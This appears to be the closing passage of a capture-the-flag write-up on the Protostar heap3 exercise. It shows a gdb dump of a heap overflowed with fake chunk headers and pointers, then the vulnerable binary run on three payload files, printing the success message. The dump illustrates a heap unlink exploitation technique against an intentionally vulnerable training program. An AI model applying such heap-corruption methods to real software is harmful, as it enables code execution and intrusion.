0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
0x0804c01b in ?? ()

Now let’s run it without gdb.

user@protostar:~$ /opt/protostar/bin/./heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
that wasn't too bad now, was it? @ 1587443061
Segmentation fault

Amazing.

David Xia